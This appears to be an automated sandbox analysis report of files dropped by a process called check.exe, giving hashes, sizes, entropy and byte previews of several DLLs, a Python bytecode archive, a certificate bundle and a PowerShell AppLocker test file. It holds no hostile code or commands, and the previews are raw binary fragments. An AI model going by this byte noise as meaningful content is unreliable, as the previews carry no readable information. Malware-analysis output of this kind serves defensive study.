                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33552
                                                                                                                                                                                                            Entropy (8bit):6.446391764486538
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                            MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                            SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
                                                                                                                                                                                                            SHA-256:B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
                                                                                                                                                                                                            SHA-512:783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83728
                                                                                                                                                                                                            Entropy (8bit):6.331814573029388
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
                                                                                                                                                                                                            MD5:FE896371430BD9551717EF12A3E7E818
                                                                                                                                                                                                            SHA1:E2A7716E9CE840E53E8FC79D50A77F40B353C954
                                                                                                                                                                                                            SHA-256:35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
                                                                                                                                                                                                            SHA-512:67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181520
                                                                                                                                                                                                            Entropy (8bit):5.972827303352998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
                                                                                                                                                                                                            MD5:1C0E3E447F719FBE2601D0683EA566FC
                                                                                                                                                                                                            SHA1:5321AB73B36675B238AB3F798C278195223CD7B1
                                                                                                                                                                                                            SHA-256:63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
                                                                                                                                                                                                            SHA-512:E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38160
                                                                                                                                                                                                            Entropy (8bit):6.338856805460127
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
                                                                                                                                                                                                            MD5:1C30CC7DF3BD168D883E93C593890B43
                                                                                                                                                                                                            SHA1:31465425F349DAE4EDAC9D0FEABC23CE83400807
                                                                                                                                                                                                            SHA-256:6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
                                                                                                                                                                                                            SHA-512:267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1394456
                                                                                                                                                                                                            Entropy (8bit):5.531698507573688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                            MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                            SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                            SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                            SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):299427
                                                                                                                                                                                                            Entropy (8bit):6.047872935262006
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                            MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                            SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                            SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                            SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                            Entropy (8bit):4.818583535960129
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
                                                                                                                                                                                                            MD5:56FE4F6C7E88212161F49E823CCC989A
                                                                                                                                                                                                            SHA1:16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
                                                                                                                                                                                                            SHA-256:002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
                                                                                                                                                                                                            SHA-512:7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):124928
                                                                                                                                                                                                            Entropy (8bit):5.953784637413928
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
                                                                                                                                                                                                            MD5:10116447F9276F10664BA85A5614BA3A
                                                                                                                                                                                                            SHA1:EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
                                                                                                                                                                                                            SHA-256:C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
                                                                                                                                                                                                            SHA-512:C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5232408
                                                                                                                                                                                                            Entropy (8bit):5.940072183736028
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                            MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                            SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                            SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                            SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39696
                                                                                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):792856
                                                                                                                                                                                                            Entropy (8bit):5.57949182561317
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                            MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                            SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                            SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                            SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):67072
                                                                                                                                                                                                            Entropy (8bit):5.909456553599775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:j3sHmR02IvVxv7WCyKm7c5Th4JBHTOvyyaZE:jnIvryCyKx5Th4J5OvyyO
                                                                                                                                                                                                            MD5:49AC12A1F10AB93FAFAB064FD0523A63
                                                                                                                                                                                                            SHA1:3AD6923AB0FB5D3DD9D22ED077DB15B42C2FBD4F
                                                                                                                                                                                                            SHA-256:BA033B79E858DBFCBA6BF8FB5AFE10DEFD1CB03957DBBC68E8E62E4DE6DF492D
                                                                                                                                                                                                            SHA-512:1BC0F50E0BB0A9D9DDDAD31390E5C73B0D11C2B0A8C5462065D477E93FF21F7EDC7AA2B2B36E478BE0A797A38F43E3FBEB6AAABEF0BADEC1D8D16EB73DF67255
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nT..*5..*5..*5..#M2. 5..x@..(5..x@..&5..x@.."5..x@...5...k..(5..aM..;5..*5...5...@..:5...@..+5...@^.+5...@..+5..Rich*5..................PE..d...._.g.........." .........h......\........................................@............`.........................................0...`.......@.... .......................0..(.......................................8............................................text...h........................... ..`.rdata..\I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70416
                                                                                                                                                                                                            Entropy (8bit):6.1258200129869405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
                                                                                                                                                                                                            MD5:16855EBEF31C5B1EBE767F1C617645B3
                                                                                                                                                                                                            SHA1:315521F3A748ABFA35CD4D48E8DD09D0556D989B
                                                                                                                                                                                                            SHA-256:A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
                                                                                                                                                                                                            SHA-512:C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6083856
                                                                                                                                                                                                            Entropy (8bit):6.126922729922386
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
                                                                                                                                                                                                            MD5:B9DE917B925DD246B709BB4233777EFD
                                                                                                                                                                                                            SHA1:775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
                                                                                                                                                                                                            SHA-256:0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
                                                                                                                                                                                                            SHA-512:F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30992
                                                                                                                                                                                                            Entropy (8bit):6.554484610649281
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
                                                                                                                                                                                                            MD5:20831703486869B470006941B4D996F2
                                                                                                                                                                                                            SHA1:28851DFD43706542CD3EF1B88B5E2749562DFEE0
                                                                                                                                                                                                            SHA-256:78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
                                                                                                                                                                                                            SHA-512:4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):709904
                                                                                                                                                                                                            Entropy (8bit):5.861739047785334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
                                                                                                                                                                                                            MD5:0902D299A2A487A7B0C2D75862B13640
                                                                                                                                                                                                            SHA1:04BCBD5A11861A03A0D323A8050A677C3A88BE13
                                                                                                                                                                                                            SHA-256:2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
                                                                                                                                                                                                            SHA-512:8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
